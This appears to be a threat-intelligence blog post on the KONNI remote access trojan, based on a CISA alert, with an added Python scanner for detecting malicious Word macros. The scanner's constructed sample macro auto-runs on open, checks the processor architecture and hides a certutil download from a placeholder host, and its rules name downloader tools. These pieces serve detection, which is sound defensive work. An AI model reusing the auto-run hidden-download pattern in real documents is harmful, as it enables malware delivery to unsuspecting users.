KONNI Malware


Hackers are using a phishing campaign to deploy KONNI malware, a remote access trojan (RAT), via Microsoft Word documents containing malicious Visual Basic for Applications (VBA) macro code, according to a recent alert from the Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA).

First observed in 2014, the malware has been linked to several campaigns tied to North Korea. It also shares significant code with the NOKKI malware family, and researchers have some evidence linking KONNI to the APT37 hacking group.

KONNI is typically delivered through spear-phishing campaigns, which are highly targeted and personalized compared with traditional phishing attacks that rely on volume. The targeted nature of the attack makes it difficult for even the most tech-savvy user to detect.

According to the alert, KONNI's malicious code can change the font color from light grey to black to dupe the potential victim into enabling the content of the malicious email attachment.

The code is also able to determine whether the Windows operating system is a 32-bit or 64-bit version, and then constructs and executes the command line used to download additional files.
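As an added example that is not part of this post or the CISA alert, the following Python scanner turns the macro behaviours described above into simple detection heuristics: an auto-executing macro, a font-color change that reveals hidden text, a processor-architecture check, and construction of a command line that downloads further files. The sample macro text, rule names, weights and the placeholder URLs are all constructed for illustration; they are not KONNI code or CISA signatures.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample mimicking the maldoc behaviours the alert describes
# (reveal hidden text, check 32/64-bit, build a download command).
# This is illustrative text only, not real KONNI macro code.
SAMPLE_MACRO = """
Sub AutoOpen()
    ActiveDocument.Content.Font.Color = wdColorBlack
    Dim arch As String
    arch = Environ("PROCESSOR_ARCHITECTURE")
    If arch = "AMD64" Then
        cmd = "certutil -urlcache -split -f http://placeholder.example/x64.txt"
    Else
        cmd = "certutil -urlcache -split -f http://placeholder.example/x86.txt"
    End If
    Shell cmd, vbHide
End Sub
"""

# Constructed benign macro used to show the scanner does not flag ordinary formatting code.
BENIGN_MACRO = """
Sub FormatReport()
    Selection.Font.Bold = True
    MsgBox "Report formatted"
End Sub
"""

# Heuristic rules: name -> (regex, weight). Weights are arbitrary choices for
# this example; tune them against your own corpus of documents.
RULES: Dict[str, Tuple[str, int]] = {
    # Macro that runs as soon as the document is opened
    "auto_exec": (r"\b(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", 1),
    # Font color change used to reveal text hidden in light grey
    "font_color_reveal": (r"\.Font\.Color\s*=", 2),
    # 32-bit vs 64-bit detection via environment variables
    "arch_check": (r"PROCESSOR_ARCHITE(?:CTURE|W6432)|\bAMD64\b", 2),
    # Living-off-the-land download commands and download APIs
    "downloader_cmd": (
        r"certutil\s+-urlcache|bitsadmin|URLDownloadToFile|"
        r"powershell.*(?:DownloadString|DownloadFile)",
        3,
    ),
    # Execution of a constructed command line
    "shell_exec": (r"\bShell\s*\(|\bShell\s+\w|WScript\.Shell|CreateObject\(", 2),
}

# Score at or above which a macro is reported as suspicious
THRESHOLD = 5


def scan_macro(vba_text: str) -> Dict[str, object]:
    """Apply every rule to the macro text and return the aggregated verdict."""
    hits: List[str] = []
    score = 0
    for name, (pattern, weight) in RULES.items():
        if re.search(pattern, vba_text, re.IGNORECASE):
            hits.append(name)
            score += weight
    return {"score": score, "hits": sorted(hits), "suspicious": score >= THRESHOLD}


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(label, scan_macro(text))
```

In practice the VBA text is first extracted from the .doc/.docm file, for instance with olevba from the oletools project; this scanner then runs over that text. The aggregated score matters more than any single rule, since a font-color change or an architecture check on its own is common in legitimate macros.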

A successful KONNI deployment could enable a hacker to steal data, capture keystrokes, take screenshots, and execute arbitrary malicious code. KONNI is also able to collect the IP address and usernames, delete files, create shortcuts that masquerade as legitimate files, and gather the architecture, connected drives, hostname, and computer name from the victim's machine. The malware has also been observed using the File Transfer Protocol (FTP) to exfiltrate reconnaissance data from the victim's system.

Of note, one version of KONNI can search for filenames created by previous versions of the malware, which suggests the hackers target the same victims repeatedly – and that the versions may work together, according to MITRE research.

The DHS CISA alert provides administrators with detection signatures as well as mitigation methods. Organizations are encouraged to follow best practices to strengthen their cyber posture, including maintaining up-to-date anti-virus signatures and engines.

Patch management is crucial to preventing the exploitation of vulnerable systems, and file and printer sharing services should be disabled or protected with strong passwords or Active Directory authentication.

Users should be prevented from installing and running unwanted software and should never be added to the local administrators group unless it is required for their role. Administrators must always ensure that all software downloaded from the Internet and all email attachments are scanned and deemed safe prior to opening.

Hackers have increasingly leveraged phishing attacks in recent months, with CISA recently alerting on a campaign designed to spoof the COVID-19 loan relief website. Researchers have also seen an increase in business email compromise phishing campaigns able to bypass multi-factor authentication, and another scam targeting Microsoft Office 365 executive accounts.

Red Sky Alliance can help protect against attacks such as these. We provide internal monitoring in tandem with RedXray notifications on 'external' threats, including botnet activity, public data breaches, phishing, fraud, and general targeting.

Red Sky Alliance is located in New Boston, NH, USA. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225 or feedback@wapacklabs.com.


TR-20-239-001_KONNI.pdf 
